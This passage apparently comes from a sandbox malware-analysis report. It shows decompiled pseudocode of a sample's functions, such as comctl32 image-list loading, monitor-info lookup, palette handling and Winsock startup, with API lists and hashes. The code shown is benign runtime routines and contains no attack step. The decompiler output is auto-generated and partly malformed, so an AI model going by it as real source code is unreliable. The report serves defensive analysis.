                                                                                                                                                                                                                            					_t11 = E00447D0C(_t28);
                                                                                                                                                                                                                            					_push(_t11);
                                                                                                                                                                                                                            					L0042C4AC();
                                                                                                                                                                                                                            					if(_t11 == 0) {
                                                                                                                                                                                                                            						_t33 =  *0x49d9c8; // 0x422f10
                                                                                                                                                                                                                            						E0040D200(_t33, 1);
                                                                                                                                                                                                                            						E00404378();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t17 = _v8;
                                                                                                                                                                                                                            					if(_t17 != 0) {
                                                                                                                                                                                                                            						_t17 = _t17 - 0xffffffec;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_push(_t17);
                                                                                                                                                                                                                            					_push(1);
                                                                                                                                                                                                                            					_push(E00447D0C(_t28));
                                                                                                                                                                                                                            					if( *0x49eba4() != 0) {
                                                                                                                                                                                                                            						_t34 =  *0x49d9c8; // 0x422f10
                                                                                                                                                                                                                            						E0040D200(_t34, 1);
                                                                                                                                                                                                                            						E00404378();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t37);
                                                                                                                                                                                                                            				 *[fs:eax] = _t37;
                                                                                                                                                                                                                            				_push(0x448ec5);
                                                                                                                                                                                                                            				return E00403BEC(_v8);
                                                                                                                                                                                                                            			}
















                                                                                                                                                                                                                            0x00448e3b
                                                                                                                                                                                                                            0x00448e75
                                                                                                                                                                                                                            0x00448e7a
                                                                                                                                                                                                                            0x00448e7c
                                                                                                                                                                                                                            0x00448e7c
                                                                                                                                                                                                                            0x00448e7f
                                                                                                                                                                                                                            0x00448e82
                                                                                                                                                                                                                            0x00448e87
                                                                                                                                                                                                                            0x00448e88
                                                                                                                                                                                                                            0x00448e8f
                                                                                                                                                                                                                            0x00448e91
                                                                                                                                                                                                                            0x00448e9e
                                                                                                                                                                                                                            0x00448ea3
                                                                                                                                                                                                                            0x00448ea3
                                                                                                                                                                                                                            0x00448e3d
                                                                                                                                                                                                                            0x00448e3d
                                                                                                                                                                                                                            0x00448e42
                                                                                                                                                                                                                            0x00448e44
                                                                                                                                                                                                                            0x00448e44
                                                                                                                                                                                                                            0x00448e47
                                                                                                                                                                                                                            0x00448e48
                                                                                                                                                                                                                            0x00448e51
                                                                                                                                                                                                                            0x00448e5a
                                                                                                                                                                                                                            0x00448e5c
                                                                                                                                                                                                                            0x00448e69
                                                                                                                                                                                                                            0x00448e6e
                                                                                                                                                                                                                            0x00448e6e
                                                                                                                                                                                                                            0x00448e5a
                                                                                                                                                                                                                            0x00448eaa
                                                                                                                                                                                                                            0x00448ead
                                                                                                                                                                                                                            0x00448eb0
                                                                                                                                                                                                                            0x00448ebd

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 0040D9DC: 73AC14E0.VERSION(00000000,?,00000000,0040DAB2), ref: 0040DA1E
                                                                                                                                                                                                                              • Part of subcall function 0040D9DC: 73AC14C0.VERSION(00000000,?,00000000,?,00000000,0040DA95,?,00000000,?,00000000,0040DAB2), ref: 0040DA53
                                                                                                                                                                                                                              • Part of subcall function 0040D9DC: 73AC1500.VERSION(?,0040DAC4,?,?,00000000,?,00000000,?,00000000,0040DA95,?,00000000,?,00000000,0040DAB2), ref: 0040DA6D
                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(comctl32.dll), ref: 00448DF8
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ImageList_WriteEx), ref: 00448E09
                                                                                                                                                                                                                            • 73751DE0.COMCTL32(00000000,?,00000000,00448EBE), ref: 00448E88
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: 73751AddressC1500HandleModuleProc
                                                                                                                                                                                                                            • String ID: ImageList_WriteEx$comctl32.dll$comctl32.dll
                                                                                                                                                                                                                            • API String ID: 3699963180-3125200627
                                                                                                                                                                                                                            • Opcode ID: 07ee34b8be0565e7f1cf5a0c4b1dbc2c1134b74eaf3696c36e383b944ea21b8f
                                                                                                                                                                                                                            • Instruction ID: 78786ebc40bd40dec1c5389fa6359cb69700be1fbc3bb7ccab78b7c5a69fbc81
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 07ee34b8be0565e7f1cf5a0c4b1dbc2c1134b74eaf3696c36e383b944ea21b8f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E3214870A04201ABE710EB7ADD56B6F36A8AB55708B60057FF805E72A2DF7DAC00D61D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 47%
                                                                                                                                                                                                                            			E0042C900(intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                            				void _v20;
                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                            				int _t24;
                                                                                                                                                                                                                            				intOrPtr _t26;
                                                                                                                                                                                                                            				intOrPtr _t27;
                                                                                                                                                                                                                            				intOrPtr* _t29;
                                                                                                                                                                                                                            				intOrPtr* _t31;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t29 = _a8;
                                                                                                                                                                                                                            				_t27 = _a4;
                                                                                                                                                                                                                            				if( *0x49e92d != 0) {
                                                                                                                                                                                                                            					_t24 = 0;
                                                                                                                                                                                                                            					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t29 + 4)) = 0;
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t29 + 8)) = 0;
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
                                                                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                                                                            						_t31 = _t29;
                                                                                                                                                                                                                            						 *(_t31 + 0x24) = 1;
                                                                                                                                                                                                                            						if( *_t31 >= 0x4c) {
                                                                                                                                                                                                                            							_push("DISPLAY");
                                                                                                                                                                                                                            							_push(_t31 + 0x28);
                                                                                                                                                                                                                            							L00407298();
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t24 = 1;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t26 =  *0x49e914; // 0x42c900
                                                                                                                                                                                                                            					 *0x49e914 = E0042C4FC(5, _t23, _t26, _t27, _t29);
                                                                                                                                                                                                                            					_t24 =  *0x49e914(_t27, _t29);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t24;
                                                                                                                                                                                                                            			}















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0042C958
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042C96D
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042C978
                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,DISPLAY), ref: 0042C9A2
                                                                                                                                                                                                                              • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(74690000,00000000), ref: 0042C57C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                                                                                                                                                                                            • String ID: DISPLAY$GetMonitorInfoA
                                                                                                                                                                                                                            • API String ID: 2545840971-1370492664
                                                                                                                                                                                                                            • Opcode ID: 8a9a46968513322436fba69e5700a9e92a77edf146df8e9d6d7adf034272d7b6
                                                                                                                                                                                                                            • Instruction ID: f52c56f8859c3bc03712ace229276911b675d95da7c00cdafe0d7f24be773c7c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8a9a46968513322436fba69e5700a9e92a77edf146df8e9d6d7adf034272d7b6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E11B4F17017249FD720DF61AC84BABB7A8FB4A310F40493FE94597250D375A940C7AA
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 47%
                                                                                                                                                                                                                            			E0042C9D4(intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                            				void _v20;
                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                            				int _t24;
                                                                                                                                                                                                                            				intOrPtr _t26;
                                                                                                                                                                                                                            				intOrPtr _t27;
                                                                                                                                                                                                                            				intOrPtr* _t29;
                                                                                                                                                                                                                            				intOrPtr* _t31;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t29 = _a8;
                                                                                                                                                                                                                            				_t27 = _a4;
                                                                                                                                                                                                                            				if( *0x49e92e != 0) {
                                                                                                                                                                                                                            					_t24 = 0;
                                                                                                                                                                                                                            					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t29 + 4)) = 0;
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t29 + 8)) = 0;
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
                                                                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                                                                            						_t31 = _t29;
                                                                                                                                                                                                                            						 *(_t31 + 0x24) = 1;
                                                                                                                                                                                                                            						if( *_t31 >= 0x4c) {
                                                                                                                                                                                                                            							_push("DISPLAY");
                                                                                                                                                                                                                            							_push(_t31 + 0x28);
                                                                                                                                                                                                                            							L00407298();
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t24 = 1;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t26 =  *0x49e918; // 0x42c9d4
                                                                                                                                                                                                                            					 *0x49e918 = E0042C4FC(6, _t23, _t26, _t27, _t29);
                                                                                                                                                                                                                            					_t24 =  *0x49e918(_t27, _t29);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t24;
                                                                                                                                                                                                                            			}















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0042CA2C
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042CA41
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042CA4C
                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,DISPLAY), ref: 0042CA76
                                                                                                                                                                                                                              • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(74690000,00000000), ref: 0042C57C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                                                                                                                                                                                            • String ID: DISPLAY$GetMonitorInfoW
                                                                                                                                                                                                                            • API String ID: 2545840971-2774842281
                                                                                                                                                                                                                            • Opcode ID: 25480e234fa7b0967a1bf53cae06218e6be674b0b36bcbe745a1c0771c571004
                                                                                                                                                                                                                            • Instruction ID: da6544c83ea616b7bbcbecc7cac92abfbfd15a320570470bed168d46318f2a96
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 25480e234fa7b0967a1bf53cae06218e6be674b0b36bcbe745a1c0771c571004
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D11103B1B413289FD760CF61AC84BAFB7A8FB06310F40493BE85597290D375A944CBA8
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 67%
                                                                                                                                                                                                                            			E00428F38(int __eax, void* __ecx, intOrPtr __edx) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				int _v12;
                                                                                                                                                                                                                            				struct HDC__* _v16;
                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                            				struct tagRGBQUAD _v1044;
                                                                                                                                                                                                                            				int _t16;
                                                                                                                                                                                                                            				struct HDC__* _t18;
                                                                                                                                                                                                                            				int _t31;
                                                                                                                                                                                                                            				int _t34;
                                                                                                                                                                                                                            				intOrPtr _t41;
                                                                                                                                                                                                                            				void* _t43;
                                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                                            				void* _t48;
                                                                                                                                                                                                                            				intOrPtr _t49;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t16 = __eax;
                                                                                                                                                                                                                            				_t46 = _t48;
                                                                                                                                                                                                                            				_t49 = _t48 + 0xfffffbf0;
                                                                                                                                                                                                                            				_v8 = __edx;
                                                                                                                                                                                                                            				_t43 = __eax;
                                                                                                                                                                                                                            				if(__eax == 0 ||  *((short*)(__ecx + 0x26)) > 8) {
                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                            					return _t16;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t16 = E004267F4(_v8, 0xff,  &_v1044);
                                                                                                                                                                                                                            					_t34 = _t16;
                                                                                                                                                                                                                            					if(_t34 == 0) {
                                                                                                                                                                                                                            						goto L4;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                            						L00407638();
                                                                                                                                                                                                                            						_v12 = _t16;
                                                                                                                                                                                                                            						_t18 = _v12;
                                                                                                                                                                                                                            						_push(_t18);
                                                                                                                                                                                                                            						L004072E0();
                                                                                                                                                                                                                            						_v16 = _t18;
                                                                                                                                                                                                                            						_v20 = SelectObject(_v16, _t43);
                                                                                                                                                                                                                            						_push(_t46);
                                                                                                                                                                                                                            						_push(0x428fe7);
                                                                                                                                                                                                                            						_push( *[fs:eax]);
                                                                                                                                                                                                                            						 *[fs:eax] = _t49;
                                                                                                                                                                                                                            						SetDIBColorTable(_v16, 0, _t34,  &_v1044);
                                                                                                                                                                                                                            						_pop(_t41);
                                                                                                                                                                                                                            						 *[fs:eax] = _t41;
                                                                                                                                                                                                                            						_push(0x428fee);
                                                                                                                                                                                                                            						SelectObject(_v16, _v20);
                                                                                                                                                                                                                            						DeleteDC(_v16);
                                                                                                                                                                                                                            						_t31 = _v12;
                                                                                                                                                                                                                            						_push(_t31);
                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                            						L00407888();
                                                                                                                                                                                                                            						return _t31;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004267F4: GetObjectA.GDI32(?,00000004), ref: 0042680B
                                                                                                                                                                                                                              • Part of subcall function 004267F4: 73C9AEA0.GDI32(?,00000000,?,?,?,00000004,?,000000FF,?,?,?,00428F6E), ref: 0042682E
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000), ref: 00428F76
                                                                                                                                                                                                                            • 73C9A590.GDI32(?,00000000), ref: 00428F82
                                                                                                                                                                                                                            • SelectObject.GDI32(?), ref: 00428F8F
                                                                                                                                                                                                                            • SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,00428FE7,?,?,?,?,00000000), ref: 00428FB3
                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 00428FCD
                                                                                                                                                                                                                            • DeleteDC.GDI32(?), ref: 00428FD6
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,?,?,?,?,00428FEE,?,00000000,00428FE7,?,?,?,?,00000000), ref: 00428FE1
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Object$Select$A590B380ColorDeleteTable
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 980243606-0
                                                                                                                                                                                                                            • Opcode ID: a3d5f77fbad06867d513725d5eef4056ba0587fdc086a60eec88e5d63d0f1340
                                                                                                                                                                                                                            • Instruction ID: 4e07099c4c205c436fb256934ce996c76079a9fb80c20dbc0557a77875d025fb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a3d5f77fbad06867d513725d5eef4056ba0587fdc086a60eec88e5d63d0f1340
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E8116671E052186BDB10EBE9DC41EAEB7BCEB08704F8144BAF904E7281DA789D40C765
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 26%
                                                                                                                                                                                                                            			E0047B898(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t19;
                                                                                                                                                                                                                            				intOrPtr _t26;
                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                            				intOrPtr _t42;
                                                                                                                                                                                                                            				void* _t51;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_push(__ebx);
                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                            				_v12 = 0;
                                                                                                                                                                                                                            				_push(_t51);
                                                                                                                                                                                                                            				_push(0x47b965);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t51 + 0xfffffff0;
                                                                                                                                                                                                                            				if( *0x49c9fc == 0) {
                                                                                                                                                                                                                            					 *0x49c9fc = LoadLibraryA("WS2_32.DLL");
                                                                                                                                                                                                                            					if( *0x49c9fc == 0) {
                                                                                                                                                                                                                            						_push(GetLastError());
                                                                                                                                                                                                                            						_push( &_v8);
                                                                                                                                                                                                                            						_t26 =  *0x49d8e0; // 0x47a5e4
                                                                                                                                                                                                                            						E00406A70(_t26,  &_v12);
                                                                                                                                                                                                                            						_push(_v12);
                                                                                                                                                                                                                            						_v20 = "WS2_32.DLL";
                                                                                                                                                                                                                            						_v16 = 0xb;
                                                                                                                                                                                                                            						_pop(_t30);
                                                                                                                                                                                                                            						E0040A664(_t30, 0,  &_v20);
                                                                                                                                                                                                                            						E0047A93C(__ebx, _v8, 1, __edi, __esi);
                                                                                                                                                                                                                            						E00404378();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t19 =  *0x49c9fc; // 0x0
                                                                                                                                                                                                                            					 *0x49ee80 = GetProcAddress(_t19, "WSAStartup");
                                                                                                                                                                                                                            					 *0x49ee80(_a4, _a8);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t42);
                                                                                                                                                                                                                            				 *[fs:eax] = _t42;
                                                                                                                                                                                                                            				_push(0x47b96c);
                                                                                                                                                                                                                            				return E004049E4( &_v12, 2);
                                                                                                                                                                                                                            			}


                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(WS2_32.DLL,00000000,0047B965), ref: 0047B8C7
                                                                                                                                                                                                                            • GetLastError.KERNEL32(WS2_32.DLL,00000000,0047B965), ref: 0047B8DA
                                                                                                                                                                                                                              • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 0047B92B
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Load$AddressErrorLastLibraryProcString
                                                                                                                                                                                                                            • String ID: WS2_32.DLL$WS2_32.DLL$WSAStartup
                                                                                                                                                                                                                            • API String ID: 607613470-1314211545
                                                                                                                                                                                                                            • Opcode ID: 0fb2e029a58caf397494fbfab30ddf45661e2779c1fd900704d1bcdd82aa50c6
                                                                                                                                                                                                                            • Instruction ID: c181d5f6f94ff0715040a16c2373e5647a9c70682208e90bacd88f35eee9369f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0fb2e029a58caf397494fbfab30ddf45661e2779c1fd900704d1bcdd82aa50c6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B3218EF1904204AFCB00EFA5C885B9EB7F8E758314F11C97BE618E3291D77859008B99
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                            			E00421A98(void* __eax, void* __edi, void* __ebp) {
                                                                                                                                                                                                                            				struct tagMSG _v36;
                                                                                                                                                                                                                            				long _v40;
                                                                                                                                                                                                                            				void* _v44;
                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                            				long _t12;
                                                                                                                                                                                                                            				long _t20;
                                                                                                                                                                                                                            				long _t29;
                                                                                                                                                                                                                            				signed int _t30;
                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                            				void* _t33;
                                                                                                                                                                                                                            				DWORD* _t35;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t32 = __edi;
                                                                                                                                                                                                                            				_t35 =  &_v40;
                                                                                                                                                                                                                            				_t33 = __eax;
                                                                                                                                                                                                                            				_v44 =  *((intOrPtr*)(__eax + 4));
                                                                                                                                                                                                                            				_t12 = GetCurrentThreadId();
                                                                                                                                                                                                                            				_t30 =  *0x49de40; // 0x49e034
                                                                                                                                                                                                                            				if(_t12 !=  *_t30) {
                                                                                                                                                                                                                            					WaitForSingleObject(_v44, 0xffffffff);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t29 = 0;
                                                                                                                                                                                                                            					_t20 =  *0x49e854; // 0x220
                                                                                                                                                                                                                            					_v40 = _t20;
                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                            						if(_t29 == 2) {
                                                                                                                                                                                                                            							PeekMessageA( &_v36, 0, 0, 0, 0);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t29 = MsgWaitForMultipleObjects(2,  &_v44, 0, 0x3e8, 0x40);
                                                                                                                                                                                                                            						_t30 = _t30 & 0xffffff00 | _t29 != 0xffffffff;
                                                                                                                                                                                                                            						E004218C0(_t33, _t30);
                                                                                                                                                                                                                            						if(_t29 == 1) {
                                                                                                                                                                                                                            							E004214B8(0, _t29, _t32, _t33);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					} while (_t29 != 0);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				GetExitCodeThread(_v44, _t35);
                                                                                                                                                                                                                            				asm("sbb edx, edx");
                                                                                                                                                                                                                            				E004218C0(_t33, _t30 + 1);
                                                                                                                                                                                                                            				return  *_t35;
                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00421AA6
                                                                                                                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00421AD2
                                                                                                                                                                                                                            • MsgWaitForMultipleObjects.USER32 ref: 00421AE7
                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00421B14
                                                                                                                                                                                                                            • GetExitCodeThread.KERNEL32(?,?,?,000000FF), ref: 00421B1F
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ThreadWait$CodeCurrentExitMessageMultipleObjectObjectsPeekSingle
                                                                                                                                                                                                                            • String ID: 4I
                                                                                                                                                                                                                            • API String ID: 1797888035-2364942553
                                                                                                                                                                                                                            • Opcode ID: b82a38332b8dd9ed48064de1bb5f76a85686ae63693f17ffa026617879459f65
                                                                                                                                                                                                                            • Instruction ID: 91e307cc55c87a5a0c16dfebb803382d4aeb1f0bf0ecfaa787b9004bec19efa9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b82a38332b8dd9ed48064de1bb5f76a85686ae63693f17ffa026617879459f65
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A11E130B043202BC610FAB99CC6F5E73D8AF65754F508A2AF254E72E1E679E804835A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                            			E00458714(long __eax, void* __ecx, short __edx) {
                                                                                                                                                                                                                            				struct tagPOINT _v24;
                                                                                                                                                                                                                            				long _t7;
                                                                                                                                                                                                                            				long _t12;
                                                                                                                                                                                                                            				long _t19;
                                                                                                                                                                                                                            				void* _t21;
